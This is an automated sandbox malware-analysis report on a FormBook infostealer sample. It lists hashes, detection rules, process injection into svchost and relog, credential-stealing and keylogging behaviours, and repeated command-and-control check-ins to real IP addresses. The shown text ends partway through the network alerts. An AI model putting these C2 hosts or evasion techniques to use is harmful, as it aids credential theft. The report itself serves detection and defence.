Edit tour

Windows Analysis Report
k9OEsV37GE.exe

Overview

General Information

Sample name:	k9OEsV37GE.exe renamed because original name is a hash value
Original sample name:	dd60661e4cbb841dc66168c8d7724c93706a7afaefb71fbdbccbb46d9f4456f4.exe
Analysis ID:	1588583
MD5:	6ba61148828ceaf0251c9676e9d7c5fe
SHA1:	0e917cdeaa0947cea28d7812b2c8722b23f0dedc
SHA256:	dd60661e4cbb841dc66168c8d7724c93706a7afaefb71fbdbccbb46d9f4456f4
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

k9OEsV37GE.exe (PID: 3624 cmdline: "C:\Users\user\Desktop\k9OEsV37GE.exe" MD5: 6BA61148828CEAF0251C9676E9D7C5FE)

svchost.exe (PID: 6368 cmdline: "C:\Users\user\Desktop\k9OEsV37GE.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

ClIUTLKtdeP.exe (PID: 4536 cmdline: "C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

relog.exe (PID: 5940 cmdline: "C:\Windows\SysWOW64\relog.exe" MD5: DA20D543A130003B427AEB18AE2FE094)

ClIUTLKtdeP.exe (PID: 516 cmdline: "C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 1168 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.3745363879.0000000000130000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3750754693.00000000025E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.3756481473.0000000004C20000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1679280371.0000000005150000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1678559099.0000000002D30000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1678063769.0000000000470000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3750980212.0000000002650000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3753130642.00000000042A0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.svchost.exe.470000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.svchost.exe.470000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\k9OEsV37GE.exe", CommandLine: "C:\Users\user\Desktop\k9OEsV37GE.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\k9OEsV37GE.exe", ParentImage: C:\Users\user\Desktop\k9OEsV37GE.exe, ParentProcessId: 3624, ParentProcessName: k9OEsV37GE.exe, ProcessCommandLine: "C:\Users\user\Desktop\k9OEsV37GE.exe", ProcessId: 6368, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\k9OEsV37GE.exe", CommandLine: "C:\Users\user\Desktop\k9OEsV37GE.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\k9OEsV37GE.exe", ParentImage: C:\Users\user\Desktop\k9OEsV37GE.exe, ParentProcessId: 3624, ParentProcessName: k9OEsV37GE.exe, ProcessCommandLine: "C:\Users\user\Desktop\k9OEsV37GE.exe", ProcessId: 6368, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T02:44:23.548521+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49962	47.83.1.90	80	TCP
2025-01-11T02:44:47.853055+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49973	47.83.1.90	80	TCP
2025-01-11T02:45:01.362219+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	185.151.30.223	80	TCP
2025-01-11T02:45:14.819557+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49981	176.57.65.76	80	TCP
2025-01-11T02:45:28.111130+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49985	209.74.79.41	80	TCP
2025-01-11T02:45:44.727153+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49989	46.38.243.234	80	TCP
2025-01-11T02:45:58.549671+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49993	188.114.97.3	80	TCP
2025-01-11T02:46:20.315002+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49997	18.163.74.139	80	TCP
2025-01-11T02:46:34.047558+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	50001	162.218.30.235	80	TCP
2025-01-11T02:46:48.012886+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	50005	192.186.58.31	80	TCP
2025-01-11T02:47:02.474715+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	50009	47.83.1.90	80	TCP
2025-01-11T02:47:15.910143+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	50013	104.21.96.1	80	TCP
2025-01-11T02:47:29.435642+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	50017	75.2.103.23	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T02:44:23.548521+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49962	47.83.1.90	80	TCP
2025-01-11T02:44:47.853055+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49973	47.83.1.90	80	TCP
2025-01-11T02:45:01.362219+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49977	185.151.30.223	80	TCP
2025-01-11T02:45:14.819557+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49981	176.57.65.76	80	TCP
2025-01-11T02:45:28.111130+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49985	209.74.79.41	80	TCP
2025-01-11T02:45:44.727153+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49989	46.38.243.234	80	TCP
2025-01-11T02:45:58.549671+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49993	188.114.97.3	80	TCP
2025-01-11T02:46:20.315002+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49997	18.163.74.139	80	TCP
2025-01-11T02:46:34.047558+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50001	162.218.30.235	80	TCP
2025-01-11T02:46:48.012886+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50005	192.186.58.31	80	TCP
2025-01-11T02:47:02.474715+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50009	47.83.1.90	80	TCP
2025-01-11T02:47:15.910143+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50013	104.21.96.1	80	TCP
2025-01-11T02:47:29.435642+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50017	75.2.103.23	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T02:44:40.151195+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49970	47.83.1.90	80	TCP
2025-01-11T02:44:42.713507+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49971	47.83.1.90	80	TCP
2025-01-11T02:44:45.260400+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49972	47.83.1.90	80	TCP
2025-01-11T02:44:53.688889+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49974	185.151.30.223	80	TCP
2025-01-11T02:44:56.259278+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49975	185.151.30.223	80	TCP
2025-01-11T02:44:58.791432+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49976	185.151.30.223	80	TCP
2025-01-11T02:45:07.271613+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49978	176.57.65.76	80	TCP
2025-01-11T02:45:09.867232+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49979	176.57.65.76	80	TCP
2025-01-11T02:45:13.135479+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49980	176.57.65.76	80	TCP
2025-01-11T02:45:20.438603+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49982	209.74.79.41	80	TCP
2025-01-11T02:45:23.016020+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49983	209.74.79.41	80	TCP
2025-01-11T02:45:25.548020+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49984	209.74.79.41	80	TCP
2025-01-11T02:45:34.697877+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49986	46.38.243.234	80	TCP
2025-01-11T02:45:37.245813+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49987	46.38.243.234	80	TCP
2025-01-11T02:45:39.793812+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49988	46.38.243.234	80	TCP
2025-01-11T02:45:50.951902+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49990	188.114.97.3	80	TCP
2025-01-11T02:45:53.492508+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49991	188.114.97.3	80	TCP
2025-01-11T02:45:56.021040+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49992	188.114.97.3	80	TCP
2025-01-11T02:46:12.654430+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49994	18.163.74.139	80	TCP
2025-01-11T02:46:15.240454+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49995	18.163.74.139	80	TCP
2025-01-11T02:46:17.776170+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49996	18.163.74.139	80	TCP
2025-01-11T02:46:26.466968+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49998	162.218.30.235	80	TCP
2025-01-11T02:46:28.950443+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49999	162.218.30.235	80	TCP
2025-01-11T02:46:31.509767+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50000	162.218.30.235	80	TCP
2025-01-11T02:46:40.359327+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50002	192.186.58.31	80	TCP
2025-01-11T02:46:43.496214+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50003	192.186.58.31	80	TCP
2025-01-11T02:46:45.420818+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50004	192.186.58.31	80	TCP
2025-01-11T02:46:54.590259+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50006	47.83.1.90	80	TCP
2025-01-11T02:46:57.303083+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50007	47.83.1.90	80	TCP
2025-01-11T02:46:59.870065+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50008	47.83.1.90	80	TCP
2025-01-11T02:47:08.097693+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50010	104.21.96.1	80	TCP
2025-01-11T02:47:10.626856+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50011	104.21.96.1	80	TCP
2025-01-11T02:47:13.189054+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50012	104.21.96.1	80	TCP
2025-01-11T02:47:21.774804+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50014	75.2.103.23	80	TCP
2025-01-11T02:47:24.331533+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50015	75.2.103.23	80	TCP
2025-01-11T02:47:26.907211+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50016	75.2.103.23	80	TCP
2025-01-11T02:47:35.586649+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50018	134.122.133.80	80	TCP
2025-01-11T02:47:39.502631+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50019	134.122.133.80	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: k9OEsV37GE.exe	ReversingLabs: Detection: 76%
Source: k9OEsV37GE.exe	Virustotal: Detection: 66%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 5.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3745363879.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3750754693.00000000025E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3756481473.0000000004C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1679280371.0000000005150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1678559099.0000000002D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1678063769.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3750980212.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3753130642.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: k9OEsV37GE.exe

Joe Sandbox ML: detected

Source: k9OEsV37GE.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: relog.pdbGCTL source: svchost.exe, 00000005.00000003.1646285902.0000000000825000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1646265214.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1646059395.000000000081B000.00000004.00000020.00020000.00000000.sdmp, ClIUTLKtdeP.exe, 00000007.00000002.3752091538.0000000000778000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: relog.pdb source: svchost.exe, 00000005.00000003.1646285902.0000000000825000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1646265214.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1646059395.000000000081B000.00000004.00000020.00020000.00000000.sdmp, ClIUTLKtdeP.exe, 00000007.00000002.3752091538.0000000000778000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ClIUTLKtdeP.exe, 00000007.00000002.3745419122.000000000020E000.00000002.00000001.01000000.00000005.sdmp, ClIUTLKtdeP.exe, 00000009.00000002.3745331317.000000000020E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: k9OEsV37GE.exe, 00000000.00000003.1339410746.0000000004250000.00000004.00001000.00020000.00000000.sdmp, k9OEsV37GE.exe, 00000000.00000003.1337296652.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1678675724.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1678675724.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1569339237.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1571391216.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000008.00000002.3752528747.0000000002B30000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000008.00000002.3752528747.0000000002CCE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000008.00000003.1678223144.00000000027CA000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000008.00000003.1680451814.000000000297E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: k9OEsV37GE.exe, 00000000.00000003.1339410746.0000000004250000.00000004.00001000.00020000.00000000.sdmp, k9OEsV37GE.exe, 00000000.00000003.1337296652.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000005.00000002.1678675724.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1678675724.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1569339237.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1571391216.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, relog.exe, relog.exe, 00000008.00000002.3752528747.0000000002B30000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000008.00000002.3752528747.0000000002CCE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000008.00000003.1678223144.00000000027CA000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000008.00000003.1680451814.000000000297E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: relog.exe, 00000008.00000002.3751067830.00000000026D1000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000008.00000002.3753170617.000000000315C000.00000004.10000000.00040000.00000000.sdmp, ClIUTLKtdeP.exe, 00000009.00000002.3753813140.00000000027EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1990342033.00000000066AC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: relog.exe, 00000008.00000002.3751067830.00000000026D1000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000008.00000002.3753170617.000000000315C000.00000004.10000000.00040000.00000000.sdmp, ClIUTLKtdeP.exe, 00000009.00000002.3753813140.00000000027EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1990342033.00000000066AC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F6445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00F6445A
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F6C6D1 FindFirstFileW,FindClose,	0_2_00F6C6D1
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00F6C75C
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00F6EF95
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00F6F0F2
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00F6F3F3
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00F637EF
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00F63B12
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00F6BCBC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0014C330 FindFirstFileW,FindNextFileW,FindClose,	8_2_0014C330

Source: C:\Windows\SysWOW64\relog.exe	Code function: 4x nop then xor eax, eax	8_2_00139E90
Source: C:\Windows\SysWOW64\relog.exe	Code function: 4x nop then pop edi	8_2_00145659
Source: C:\Windows\SysWOW64\relog.exe	Code function: 4x nop then mov ebx, 00000004h	8_2_029704E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49974 -> 185.151.30.223:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49962 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49971 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49962 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49987 -> 46.38.243.234:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49979 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49980 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49984 -> 209.74.79.41:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49985 -> 209.74.79.41:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49985 -> 209.74.79.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49991 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49981 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49981 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49977 -> 185.151.30.223:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49993 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49993 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49992 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49977 -> 185.151.30.223:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49982 -> 209.74.79.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49975 -> 185.151.30.223:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49972 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50009 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50009 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 46.38.243.234:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49976 -> 185.151.30.223:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50011 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49994 -> 18.163.74.139:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49970 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49990 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50000 -> 162.218.30.235:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50003 -> 192.186.58.31:80
